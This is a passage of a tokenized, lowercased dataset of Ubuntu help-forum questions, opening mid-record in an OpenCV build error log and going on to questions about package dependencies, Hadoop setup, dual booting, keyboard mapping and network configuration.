( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2628:36 : error : declaration of ‘operator-=’ as non-function matconstiterator & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2628:32 : error : expected ‘ ; ’ at end of member declaration matconstiterator & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2628:46 : error : expected ‘ ) ’ before ‘ofs’ matconstiterator & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2641:5 : error : ‘ptrdiff_t’ does not name a type ptrdiff_t lpos ( ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2642:15 : error : ‘ptrdiff_t’ has not been declared void seek ( ptrdiff_t ofs , bool relative=false ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2661:13 : error : ‘ptrdiff_t’ does not name a type typedef ptrdiff_t difference_type ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2684:21 : error : ‘ptrdiff_t’ has not been declared _tp operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2687:37 : error : declaration of ‘operator+=’ as non-function matconstiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2687:33 : error : expected ‘ ; ’ at end of member declaration matconstiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2687:47 : error : expected ‘ ) ’ before ‘ofs’ matconstiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2689:37 : error : declaration of ‘operator-=’ as non-function matconstiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2689:33 : error : expected ‘ ; ’ at end of member declaration matconstiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2689:47 : error : expected ‘ ) ’ before ‘ofs’ matconstiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2733:22 : error : declaration of ‘operator [ ] ’ as non-function _tp & operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2733:20 : error : expected ‘ ; ’ at end of member declaration _tp & operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2733:32 : error : expected ‘ ) ’ before ‘i’ _tp & operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2736:32 : error : declaration of ‘operator+=’ as non-function matiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2736:28 : error : expected ‘ ; ’ at end of member declaration matiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2736:42 : error : expected ‘ ) ’ before ‘ofs’ matiterator_ & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2738:32 : error : declaration of ‘operator-=’ as non-function matiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2738:28 : error : expected ‘ ; ’ at end of member declaration matiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2738:42 : error : expected ‘ ) ’ before ‘ofs’ matiterator_ & operator -= ( ptrdiff_t ofs ) ; ^ in file included from /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:4047:0 , from /home/bomi/opencv/modules/core/src/precomp.hpp:55 , from /home/bomi/opencv/modules/core/src/convert.cpp:43 : /home/bomi/opencv/modules/core/include/opencv2/core/operations.hpp:2822:15 : error : ‘ptrdiff_t’ does not name a type static inline ptrdiff_t operator - ( const filenodeiterator & it1 , const filenodeiterator & it2 ) ^ /home/bomi/opencv/modules/core/include/opencv2/core/operations.hpp:3383:31 : error : ‘ptrdiff_t’ does not name a type template < typename _tp > inline ptrdiff_t operator - ( const seqiterator < _tp > & a , ^ in file included from /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:4048:0 , from /home/bomi/opencv/modules/core/src/precomp.hpp:55 , from /home/bomi/opencv/modules/core/src/convert.cpp:43 : /home/bomi/opencv/modules/core/include/opencv2/core/mat.hpp:1629:57 : error : declaration of ‘operator+=’ as non-function inline matconstiterator & matconstiterator : :operator += ( ptrdiff_t ofs ) ^ /home/bomi/opencv/modules/core/include/opencv2/core/mat.hpp:1629:57 : error : ‘ptrdiff_t’ was not declared in this scope /home/bomi/opencv/modules/core/include/opencv2/core/mat.hpp:1629:57 : note : suggested alternatives : in file included from /usr/include/c++/4.8/utility:68:0 , from /usr/include/c++/4.8/algorithm:60 , from /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:56 , from /home/bomi/opencv/modules/core/src/precomp.hpp:55 , from /home/bomi/opencv/modules/core/src/convert.cpp:43 : /usr/include/x86_64-linux-gnu/c++/4.8/bits/c++config.h:187:28 : note : ‘std : :ptrdiff_t’ typedef __ptrdiff_type__ ptrdiff_t ; ^ /usr/include/x86_64-linux-gnu/c++/4.8/bits/c++config.h:187:28 : note : ‘std : :ptrdiff_t’ /home/bomi/opencv/modules/core/src/convert.cpp:1058:1 : error : expected ‘ } ’ at end of input } ^ make [ 2 ] : *** [ modules/core/cmakefiles/opencv_core.dir/src/convert.o ] 오류 1 make [ 1 ] : *** [ modules/core/cmakefiles/opencv_core.dir/all ] 오류 2 i 'm trying to install opencv 2.2.0 . i think that i followed all the steps before i ran make , but whenever i type make , it does n't work and 2 errors occur . i do n't know why it is happening . please let me know how to fix this .
497491	ubuntu 12.04.3 end of support	i have a pc for working with 12.04.3 , i 've read that it will lost support , do i need to install 14.04.1 ? i would like to use 12.04 until 2017 , it works great and as we use it for working i would'n want to have the risk of installing another version .
497492	setting up multiple ubuntu computers to share files and users	i 'm very new to the *nix world and only vaguely have heard of things like yp/nis , ldap , kerberos , etc . if i have several machines that i want to toss ubuntu on to and share users and files/mounts across them , what programs and services provide the necessary elements to do so ? i have a computer with more storage that can serve as a server , but what do i need to install and configure on it and all my workstations to-be ? the network is shared with other , unknown groups , so security is important . i do n't really expect a detailed answer here ; my problem is more i do n't know where to start . ldap sounds interesting , but it seems to do so many things i do n't know if it 's actually what to use .
497500	bios corrupted after a failed suspension	currently typing from a friend 's wii . my hp 2000-299wm laptop stalled while suspending one night , so i forced it to shutdown with the power button . now , initial hp splash screen is blank , and leads me to a non-blinking underscore , ( frozen ? ) which stays locked up . i am currently unsure if the bios settings are corrupted , or if the uefi loader , if the splashscreen is one , is broken . because i have tried many methods to clear the cmos by removing the bios battery , which means disassembling my laptop multiple times to access it , and it does n't work . the battery itself is not dead either . i hooked it up to a small electric motor , and it received power . i also did the caps lock led test , and it gave me two blinks , signifying bios corruption instead of a hardware problem . the gpu , cpu , ram , fan , hdd , and wireless card were operating at their best without any sign of degradation before this happened , so it 's telling me that the hardware is likely okay . i have owned this laptop for two years without any issues previously . how do i reset the cmos on my laptop model , if that 's the issue , or does it go deeper that ? i am so short on answers at the moment , and it 's driving me crazy .
497503	photo lens only searches one subfolder	on my computer ( running ubuntu 14.04 ) unity 's photo lens only searches one subfolder of my pictures folder . the strange thing is that there is nothing special about that folder . my photos are organized in folders by year and month in folders named like this : ~/pictures/share/yyyy/yyyy-mm/ the photo lens only searches subfolder 2013/2013-06 , but not 2013/2013-05 nor 2013/2013-07 nor anything else . the permissions on the searched folder are not different from other folders . why might be ? what can i do to debug this problem ?
497506	ubuntu 14.04 - battery problem	my three year old lenovo g570 has recently developed a unique problem . when its running on ubuntu 14.04 its battery starts draining even when connected to ac source . but when it is shutdown mode and ac source is given the battery will get charged , also when i use windows 7 it is charging.what could be the reason ?
497507	samba error message	i am new to linux and ubuntu . currently using 14.04 i believe . i had an error unable to open new log file `` /var/log/samba/log. % m '' when type samba . anybody had idea ? ls -l i got the answer total 0 ls -l /var/log/samba i got the answer total 16 another information is , i am installing debian inside virtual box on top of my windows . trying to create server inside virtual .
497511	ca n't install vlc media player ( ubuntu 14.04 )	i have a problem while trying to install vlc media player . i type sudo apt-get install vlc in the terminal , and this is what i get : sudo apt-get install vlc [ sudo ] password for hagaymosko : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . what does that mean , and how do i fix it ?
497512	login problem after update	i am using ubuntu 14.04 lts . i have updated gnome and my system logged out and not accepting password . i tried by changing the root password . still i am not able to login and still not accepting the password .
497513	how to find out the amount of hard drive space consumed by installed programs ?	i was wondering if there is any way to see all the installed programs as well as the hard drive space used by any particular program ?
497519	installing windows 7 parallel to ubuntu 12.04	i have installed ubuntu 12.04 on my dell vostro 1014 . previously there was windows 7 installed which i have replaced with ubuntu completely . now , i want to install windows 7 on it without removing ubuntu ( both in parallel ) . ubuntu 12.04 is installed on sda drive with 150gb memory and still there are 2 partitions left which are of fat/ntfs format . i can install windows either in one of the fat/ntfs partitions , but i am afraid of booting after loosing all data of that partition on which windows will be installed . is there a way to install on sda partition as well . if i install windows on another fat/ntfs partition , whether it will ask at booting .
497525	ubuntu 12.04 to 14.04 upgrade disk filter writes not supported	when i upgrade from ubuntu 12.04 to 14.04 or do a clean installation i get : error : diskfilter writes not suported . i have looked around on previous posts and the suggested solutions have not worked for me . i have a working version of 12.04 with zimbra on it so i do n't want to go forward with upgrading unless i 'm certain i have a working solution . i have tried many things including replacing etc/grub.d/10_linux with quick_boot= '' 1 '' with quick_boot= '' 0 '' etc . another question would also be what is a diskfilter ? i am eager to look at having 14.04 up and running as 12.04 will be going out of support at some stage . i 'm going to kick up a virtual box to see if i can replicate the issue in some way .
497526	about connecting vodafone dongle k4201 i	i cont able to connect my vodafone k4201i can you please tell me the ways to connect . i have installed windows 8.1 but in that it was connected . in ubuntu file explorer is open but internet dosent connect.i dont know exactly how to connect .
497527	how to set version numbers and package file names via dpkg-buildpackge for automated builds on a build server ?	our build server builds ubuntu packages ( *.deb ) via dpkg-buildpackage . the server checks out the source code via git and runs the build via make < target > . the source directory contains the debian/ subdirectory where the dpkg configuration files are . i would like to add the internal build counter number to the current package version and further set the package file name but dpkg-buildpackage does not let me control how the resulting package_version_arch.deb looks like . how can i achieve this ?
497530	gnome 3 and display profiles	is there a way to setup some display profiles for my monitors cause i run them most the time at portrait mode and other times one of my monitors in normal for videos and the sorts .
497531	mysql 5.6 depends on client 5.5	i 've installed mysql- ( server/client ) -5.6 on ubuntu 14.04 lts server but for some programs i need mysql-client ( automysqlbackup and postfix for example ) root @ server : ~ # apt-get install automysqlbackup automysqlbackup : depends : mysql-client so : root @ server : ~ # apt-get install mysql-client mysql-server the following packages have unmet dependencies : mysql-client : depends : mysql-client-5.5 but it is not going to be installed mysql-server : depends : mysql-server-5.5 but it is not going to be installed and : root @ server : ~ # apt-get install mysql-client-5.6 mysql-server-5.6 mysql-client-5.6 is already the newest version . mysql-server-5.6 is already the newest version . do i need to install mysql- ( server/client ) -5.5 alongside 5.6 ?
497536	ntfs partion still gets reset in win8 after having changes done in ubuntu	i already turned off the `` safe boot '' and `` fast startup '' ( described here ) . still . i returned after several month of not using windows at all and my whole ntfs partion was completly reset to the status it was several month back . even whole deleted truecrypt volumes where `` recovered '' . how is that even possible ? ? ? but also all `` new '' files are lost . when i boot ubuntu again it 's the same there . this is very annoying and potentially dangerous , because i use this partion to store all data , which is neither win nor ubuntu specific ( documents etc ) ... i do n't use hibernation when switching os . the only solution i 've found is to change the filesystem to something like exfat . anyone ?
497537	icon groups in xubuntu 14.04	i am trying to put some icons into groups in the xubuntu 14.04 menu . i can do this no problem for applications i have installed myself ( like wine applications ) but i seem to be unable to do so for system applications . what i am trying to do is put the settings editor and settings manager icons into the `` system '' group in the menu , but no matter how many changes i make to the .desktop files in /usr/share/applications , the icons do not appear . how would i do this ?
497540	where is my wpa_supplicant.conf ?	i am trying to locate the wpa_supplicant.conf on ubuntu 14.04 with no luck . i tried to locate but i could n't find it . the locate command gives the following output : ~ $ sudo locate wpa_supplicant.conf /etc/dbus-1/system.d/wpa_supplicant.conf /home/pervysage/wpa_supplicant.conf /usr/share/doc/wpasupplicant/examples/wpa_supplicant.conf.gz /usr/share/man/man5/wpa_supplicant.conf.5.gz i am connected to my wi-fi so there must be a wpa_supplicant.conf file present , right ? if so , why am i unable to locate it ?
497546	namenode format and starting the namenode in hadoop2.2.0	i am trying to install single node configuration , i succeeded to certain point like downloading and unzipping the tar and editing all the configuration files , but faced problems when formatting the namenode . the errors are : 14/07/14 02:56:40 warn fs.fileutil : failed to delete file or dir [ /home/renu123/yarn/yarn_data/hdfs/namenode/current/seen_txid ] : it still exists . 14/07/14 02:56:40 warn fs.fileutil : failed to delete file or dir [ /home/renu123/yarn/yarn_data/hdfs/namenode/current/version ] : it still exists . 14/07/14 02:56:40 warn fs.fileutil : failed to delete file or dir [ /home/renu123/yarn/yarn_data/hdfs/namenode/current/fsimage_0000000000000000000 ] : it still exists . 14/07/14 02:56:40 warn fs.fileutil : failed to delete file or dir [ /home/renu123/yarn/yarn_data/hdfs/namenode/current/fsimage_0000000000000000000.md5 ] : it still exists . 14/07/14 02:56:40 fatal namenode.namenode : exception in namenode join java.io.ioexception : can not remove current directory : /home/renu123/yarn/yarn_data/hdfs/namenode/current at org.apache.hadoop.hdfs.server.common.storage $ storagedirectory.cleardirectory ( storage.java:299 ) at org.apache.hadoop.hdfs.server.namenode.nnstorage.format ( nnstorage.java:523 ) at org.apache.hadoop.hdfs.server.namenode.nnstorage.format ( nnstorage.java:544 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.format ( fsimage.java:147 ) at org.apache.hadoop.hdfs.server.namenode.namenode.format ( namenode.java:837 ) at org.apache.hadoop.hdfs.server.namenode.namenode.createnamenode ( namenode.java:1213 ) at org.apache.hadoop.hdfs.server.namenode.namenode.main ( namenode.java:1320 ) 14/07/14 02:56:40 info util.exitutil : exiting with status 1 14/07/14 02:56:40 info namenode.namenode : shutdown_msg : /************************************************************ shutdown_msg : shutting down namenode at ubuntu/127.0.1.1 ************************************************************/ after searching on google i formatted namenode by switching to root account as below : root @ ubuntu : ~/yarn/yarn_data/hdfs/namenode # hdfs namenode -format re-format filesystem in storage directory /home/renu123/yarn/yarn_data/hdfs/namenode ? ( y or n ) y 14/07/14 02:59:30 info common.storage : storage directory /home/renu123/yarn/yarn_data/hdfs/namenode has been successfully formatted . 14/07/14 02:59:30 info namenode.fsimage : saving image file /home/renu123/yarn/yarn_data/hdfs/namenode/current/fsimage.ckpt_0000000000000000000 using no compression 14/07/14 02:59:30 info namenode.fsimage : image file /home/renu123/yarn/yarn_data/hdfs/namenode/current/fsimage.ckpt_0000000000000000000 of size 196 bytes saved in 0 seconds . 14/07/14 02:59:30 info namenode.nnstorageretentionmanager : going to retain 1 images with txid > = 0 14/07/14 02:59:30 info util.exitutil : exiting with status 0 14/07/14 02:59:30 info namenode.namenode : shutdown_msg : /************************************************************ shutdown_msg : shutting down namenode at ubuntu/127.0.1.1 ************************************************************/ even after formatting still i can see the directories in hdfs/namenode folder i.e current assuming the namenode is formatted i proceeded further and tried to start namenode using the command start-dfs.sh , but was n't able to . this is the log take out from usr/local/hadoop/logs : 2014-07-14 02:49:10,478 warn org.apache.hadoop.hdfs.server.common.storage : can not access storage directory /home/renu123/yarn/yarn_data/hdfs/namenode 2014-07-14 02:49:10,484 info org.mortbay.log : stopped selectchannelconnector @ 0.0.0.0:50070 2014-07-14 02:49:10,585 info org.apache.hadoop.metrics2.impl.metricssystemimpl : stopping namenode metrics system ... 2014-07-14 02:49:10,585 info org.apache.hadoop.metrics2.impl.metricssystemimpl : namenode metrics system stopped . 2014-07-14 02:49:10,586 info org.apache.hadoop.metrics2.impl.metricssystemimpl : namenode metrics system shutdown complete . 2014-07-14 02:49:10,587 fatal org.apache.hadoop.hdfs.server.namenode.namenode : exception in namenode join org.apache.hadoop.hdfs.server.common.inconsistentfsstateexception : directory /home/renu123/yarn/yarn_data/hdfs/namenode is in an inconsistent state : storage directory does not exist or is not accessible . at org.apache.hadoop.hdfs.server.namenode.fsimage.recoverstoragedirs ( fsimage.java:292 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.recovertransitionread ( fsimage.java:200 ) at org.apache.hadoop.hdfs.server.namenode.fsnamesystem.loadfsimage ( fsnamesystem.java:787 ) at org.apache.hadoop.hdfs.server.namenode.fsnamesystem.loadfromdisk ( fsnamesystem.java:568 ) at org.apache.hadoop.hdfs.server.namenode.namenode.loadnamesystem ( namenode.java:443 ) at org.apache.hadoop.hdfs.server.namenode.namenode.initialize ( namenode.java:491 ) at org.apache.hadoop.hdfs.server.namenode.namenode. < init > ( namenode.java:684 ) at org.apache.hadoop.hdfs.server.namenode.namenode. < init > ( namenode.java:669 ) at org.apache.hadoop.hdfs.server.namenode.namenode.createnamenode ( namenode.java:1254 ) at org.apache.hadoop.hdfs.server.namenode.namenode.main ( namenode.java:1320 ) 2014-07-14 02:49:10,590 info org.apache.hadoop.util.exitutil : exiting with status 1 2014-07-14 02:49:10,602 info org.apache.hadoop.hdfs.server.namenode.namenode : shutdown_msg : help me find the solution to this . my configuration files are core-site.xml < configuration > < property > < name > fs.default.name < /name > < value > hdfs : //localhost:9000 < /value > < /property > < /configuration > yarn-ste.xml < configuration > < ! -- site specific yarn configuration properties -- > < property > < name > yarn.nodemanager.aux-services < /name > < value > mapreduce_shuffle < /value > < /property > < property > < name > yarn.nodemanager.aux-services.mapreduce.shuffle.class < /name > < value > org.apache.hadoop.mapred.shufflehandler < /value > < /property > < /configuration > mapred-site.xml < configuration > < property > < name > mapreduce.framework.name < /name > < value > yarn < /value > < /property > < /configuration > hdfs-site.xml < configuration > < property > < name > dfs.replication < /name > < value > 1 < /value > < /property > < property > < name > dfs.namenode.name.dir < /name > < value > file : /home/renu123/yarn/yarn_data/hdfs/namenode < /value > < /property > < property > < name > dfs.datanode.data.dir < /name > < value > file : /home/renu123/yarn/yarn_data/hdfs/datanode < /value > < /property > < /configuration >
497549	dual boot ubuntu - mounting problem	after i decided to enlarge ubuntu 's partition my grub2 failed to start . i managed to recover grub but when i chose to boot ubuntu this came out : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v.1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ booting in recovery mode does n't help - the lines loading then this appears anyway .
497551	what does functional_qml_application_uses_friends mean ?	in a review for my click package , i saw the following message : functional_qml_application_uses_friends what does it mean and how do i fix it ?
497553	geany compiler , c programming , ubuntu 14.04 , ca n't show program output	i wrote a simple program to print `` hello world '' . the compiler shows a message `` compilation finished successfully '' . but the out put of the program , i ca n't see anywhere . as using codeblocks a new terminal comes out with the program output . how can i see the program output using geany compiler .
497554	ca n't sudo after removing password from administrator account	i 'm using ubuntu 13.10 64bit . in the `` system settings '' - > '' user accounts '' i chose the `` login without a password '' . this was my only administrator account , so according to this answer , i encountered bug # 1168749 , meaning i ca n't authenticate , not in the terminal and not in the gui . i tried all of these answers : http : //askubuntu.com/a/152617 http : //askubuntu.com/a/70445 http : //askubuntu.com/a/136537 http : //www.psychocats.net/ubuntu/fixsudo http : //askubuntu.com/a/194760/252848 http : //askubuntu.com/a/441575/252848 after the first two i was again able to authenticate in the gui , but still ca n't sudo in the terminal after trying all these answers and solutions.. anyone knows how to fix this bug ? edit actually i was wrong , i can sudo ( silly mistake , my bad ) . i just kept trying to enter su and it said : su : authentication failure
497555	removing desktop icons	in ubuntu 14.04 unity places computer , home and trash icons on the desktop . i 've tried using unity-tweak to remove them but they 're still there . how can i remove them ?
497561	how to install wireless using ubuntu 14.04 lts and usb-ac56	my asus usb-ac56 isnt installing [ via cd ] on my new ubuntu pc . i can not wire it to the internet and must use this device . i am brand new to linux and do not understand how to execute this from the command line . this is the first problem i 've run into that youtube could n't walk me through . is there a different wireless connector i should be using for ubuntu or is there a way to make these two work together ?
497562	process 'leaking ' from lightdm session	when i restart lightdm or log out and log back in , a process is left left running . a new logind session is opened , but the old one remains running : c68 - john ( 1000 ) since : mon 2014-07-14 19:32:26 jst ; 12min ago leader : 21764 seat : seat0 ; vc7 display : :0 service : lightdm-autologin ; type x11 ; class user state : closing cgroup : systemd : /user/1000.user/c68.session └─21897 ruby ./scripts/my_script how can i modify my configuration or the script to exit correctly
497565	howto to set altgr key with xmodmap	i use a us-intl with `` altgr dead keys '' layout and the option to switch alt and win key . nice , but my altgr does not work . the key i want to use for altgr has keycode 134 ( found out using xev ) . so i create a .xmodmap file : keycode 134 = iso_level3_shift multi_key iso_level3_shift multi_key than i execute `` xmodmap .xmodmap '' . when i now show my modifier , i get : > xmodmap xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock control control_l ( 0x25 ) , control_r ( 0x69 ) mod1 alt_l ( 0x85 ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x40 ) , super_r ( 0x6c ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , iso_level3_shift ( 0x86 ) , mode_switch ( 0xcb ) but ... pressing `` altgr '' ( the key with code 134=0x86 ) + `` q '' does not give the expected result - which would be `` a-umlaut '' . it should ! xmodmap -pke contains this line : keycode 24 = q q q q adiaeresis adiaeresis adiaeresi so what is wrong and what can i do ?
497566	how do i get the osd for brightness hotkeys on kubuntu 14.04 kde 4.13 ?	i am using kde sc 4.13.2 on kubuntu 14.04 ( 64-bit ) . the screen brightness changes with the brightness hotkeys on my keyboard ( lenovo g500 ) but the osd showing the brightness level does not appear . the osd for changes in sound volume appears correctly , and the osd for brightness also appears on unity and gnome . it also appears if i change the brightness through software ; it does not appear only when using the hotkeys ( special function keys ) . is there any way to get the osd back ? ( i do not know if the following has anything to do with this : http : //mail.kde.org/pipermail/plasma-devel/2014-march/029388.html )
497569	virtualbox / lenovo will not capture f12 to pxe boot	system description : ubuntu 14.04 lenovo t440s laptop virtualbox 4.3.12.r93733 virtualbox is set up to use lan network in bridged mode and i 'm trying to pxe boot into an install server on our lan . issue 1 : when booting i need to press f12 to go into alternative boot . f12 is not responding , even with virtualbox in full screen mode . solved with : changing the boot order in virtualbox issue2 : after pxe booting , i need to press f12 to go into the new os . f12 is still not responding . solved with : attaching a normal usb keyboard . also fixed issue 1 . it is unclear to me if this is an issue with the laptop , ubuntu or virtualbox , and why using an external keyboard fix the issue . does anyone know why this happens ? how can i go about finding the root of this problem ?
497572	usb port sniffing on ubuntu 14.04	i am working on a project now and i upgraded to ubuntu 14.04 . i need to do some sniffing on a usb device , and i used to do it with usbmon . however , usbmon does n't seem to be available on ubuntu 14 . is there a way to get usbmon as a module ? if not , is there a tool i can use to sniff ports ?
497574	converting xsl files to cvs files in command line	i have a set of xls files which i want to convert to .csv retaining the original base name . i found that this code worked best : unoconv -f csv *.xls also there are other ways in this link converting xls to csv but i wanted to retain the same name . after a while it showed me this error failed to connect to /usr/lib/libreoffice/program/soffice.bin ( pid=7779 ) in 6 seconds . connector : could n't connect to socket ( success ) error : unable to connect or start own listener . aborting . i have tried reinstalling but it does not work . i would like any help where i can retain the name of the xls file and convert it to csv . i am using this code in an r environment and accessing the system terminal .
497577	problem after moodle installation	after i had installed moodle , the next time when i started moodle from : localhost , every time browser redirects me to localhost/moodle , with the error `` 404 not found '' . i am unable to detect the issue .
497578	nautilus 2-pane synchronized browsing	sometimes i use in nautilus , in left pane one local directory and in right pane an other ( e.g . ftp ) directory . is there a script that could enable synchronized browsing ? i mean when i am in left pane in /site/js and in right pane in /httpdocs/js , when i go in left /site/js/folder1 to go in right pane in /httpdocs/js/folder1 automatically . you have of course to set in the beginning that the left /site/ is in sync view with /httpdocs/ on right pane .
497584	how to remove a third party software that is installed but can not be located ?	i have been on ubuntu 14.04 for a while now . i was looking for a dvd burning software because both brasero and k3b proved quite unsatisfactory . eventually i located nero linux 4.0 on the internet and downloaded it . when i tried to install it , i was led to the software manager even though nero linux is not listed under it . the software manager warned me that the application ( nero linux ) is of poor quality and can severely harm the computer . but since i desperately needed a dvd burner , i decided i would `` try ubuntu '' from the ubuntu installation disc , install the nero linux within it and see how it goes . to my great relief , it worked so well that i decided to install it permanently . however , before doing so i wanted to make sure how to uninstall it -- in case something should go wrong . and in this i was utterly surprised , since the nero linux , although installed and working , could not even be located anywhere -- neither by the terminal nor by the software manager ! ! i would appreciate it if anyone having more experience with ubuntu could provide some help in this regard . can it be that the application , though not traceable now , will show up in a regular ubuntu operating system and it will then be possible to remove it like any other software ?
497588	deleted /default/index.theme	could anyone who is using the standard ambiance or radiance themes and icons , please post me a copy of this file /usr/share/icon/default/index.theme , i overwrote it by accident and do not have a back up . it would be very much appreciated . : )
497591	emacs 24 in ubuntu 14.04 : can i remove whitespace of the toolbar ?	i have installed emacs 24 in ubuntu 14.04 using sudo apt-get install emacs . however it has strange white space in the leftside of the toolbar . can i remove that , or at least change the color of it ? i have tried the following but none worked : turning off the `` fringe '' option , but it is separate from toolbar whitespace . i already know how to remove the entire toolbar ( tool-bar-mode -1 ) but i like the toolbar so i do n't want to do that . i have googled `` emacs toolbar '' or some other keywords but i can not find meaningful answers . i have tried editing .xresources but i do n't know what the toolbar related settings are named . google did n't reveal much other than hiding the entire toolbar ( emacs.toolbar : off ) .
497592	communication between js and c++ process on ubuntu platform	we develop board on ubuntu platform using ubuntu sdk which contains 2 parts - 2 differrent processes : 1 . gui 2. business logic - implemented as c++ process there should be a bidirectional communication between the processes it will be implements on ubuntu mobile platform and we want to implement the gui using html/cordova . the question is how js code can communicate with c++ process ? thanks in advance .
497602	seting proxy settings	i have the proxy address , a user name and a password for the proxy server i need to connect through , but when i set the proxy details under system setting = > network = > network proxy , only firefox seems to be able to connected to the internet . the ubuntu software centre and apt-get does not seem to be able to connect to the internet , i have already tried this and a bunch of other things but nothing seems to work .
497607	can i turn off gedit antialiasing ?	as the text seems blurry i 'd like to disable antialiasing in gedit . i do n't see anything related in the program 's preferences . the problem appeared after upgrade from 12.04 to 14.04 :
497609	ubuntu do not follow preseed file for network settings	i am trying to automate ubuntu installations using cobbler and preseed . i refered this officical sample seed file for ubuntu https : //help.ubuntu.com/12.04/installation-guide/example-preseed.txt i only edit network related part in this file and now this is my sample.seed file http : //paste.ubuntu.com/7793361/ i did not edited anything else . my target machine has two nic . eth0 and eth1 . only eth1 is connected to cobbler server through private network . after booting ubuntu mini iso it asks me to manually select between eth0 and eth1 and also ask to manually configure ip , netmask and other details as shown here http : //imgur.com/l2iramv but i have already set all these settings in that preseed file . i have set my seed file location correctly as /var/lib/cobbler/kickstarts/sample.seed for testing purpose i disabled second nic , and only enabled one nic . then i manually set the network information . still ubuntu tries to use dhcp and says can not configure network and halts . same issue if i use kickstart instead of preseed . kindly help to trouble shoot this issue . how can i make ubuntu to autoselect eth1 and apply all other networking settings such as , ip , netwask etc automatically ?
497611	display issue on powerbook g4 running 10.4	i today i installed ubuntu 10.4 on my 13in powerbook g4 from a live cd . when i first booted from the cd i had no problems . i clicked install ubuntu and went through the process normally . when i finished installing it , it restarted , i logged in and everything was fine . but anytime after that when i restart , it starts the boot process , and when it reaches the screen that says `` ubuntu '' with the loading dots , the display cuts out and goes black . i can tell it 's only the display and not the computer because shortly after i hear the standard startup sound . is there anything i can do ?
497612	how do you disable touchpad in ubuntu 14.04lts ?	how do i disable the touchpad while using bluetooth mouse ? the synaptic ( k ) s touchpad app does not appear to be available in the software center for 14.04 .
497613	after unb , where do i go ?	i 've been running lucid nbr since forever and i love it . a recent kernel update broke some services and while a revision fixed them , the writing is on the wall , i have to update . unity fits on my netbook like an elephant in a bucket , but i read on a linux mint forum that i can modify the buttons on the unity launcher to make them bigger , in some way emulating the unb launcher . can someone tell me how i can do this ? the next step , of course is to get the launcher to show more launchers as its children . so , for example , i would have an electronics entry in the unity launcher , and it would offer my electronics calculator , my circuit simulator , my schematics capture software and links to my parts suppliers and pcb manufacturers as a launcher . similarly fo my programming stuff and my other applications . is this possible ? if so , can someone tell me how ( in detail ) ? pogo ( standing at the door and looking towards linux mint )
